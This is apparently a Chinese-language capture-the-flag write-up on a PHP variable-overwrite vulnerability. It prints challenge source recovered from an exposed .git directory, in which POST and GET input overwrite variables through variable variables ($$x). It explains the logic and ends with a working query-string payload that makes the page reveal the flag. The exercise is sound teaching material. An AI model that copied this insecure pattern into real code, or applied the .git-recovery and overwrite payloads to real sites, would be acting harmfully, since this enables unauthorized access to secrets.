主要考察变量覆盖漏洞
    先扫目录,扫到.git,用git_extract还原。

    1. <?php
    3. include 'flag.php';
    5. $yds = "dog";
    6. $is = "cat";
    7. $handsome = 'yds';
    9. foreach($_POST as $x => $y){
    10.     $$x = $y;
    11. }
    13. foreach($_GET as $x => $y){
    14.     $$x = $$y;
    15. }
    17. foreach($_GET as $x => $y){
    18.     if($_GET['flag'] === $x && $x !== 'flag'){
    19.         exit($handsome);
    20.     }
    21. }
    23. if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    24.     exit($yds);
    26. if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    27.     exit($is);
    28. }
    30. echo "the flag is: ".$flag;

    首先正常情况,会发现底端输出了一个dog,也就是说在第二处if时断掉了,那么传入一个flag变量,结果发现底部变成了the flag is:,然而后面什么都没显示,原因是因为上面的foreach将flag变量覆盖了:

    1. ?flag=1 ==> $flag=$1

    显然$1是不存在的,那么如果传递flag=flag呢,这样就会触发最下面的$_GET['flag'] === 'flag'判断,输出cat。但是如果再传入is,让其被flag的值覆盖,最后输出的就是flag了。
    payload:

    1. index.php?flag=flag&is=flag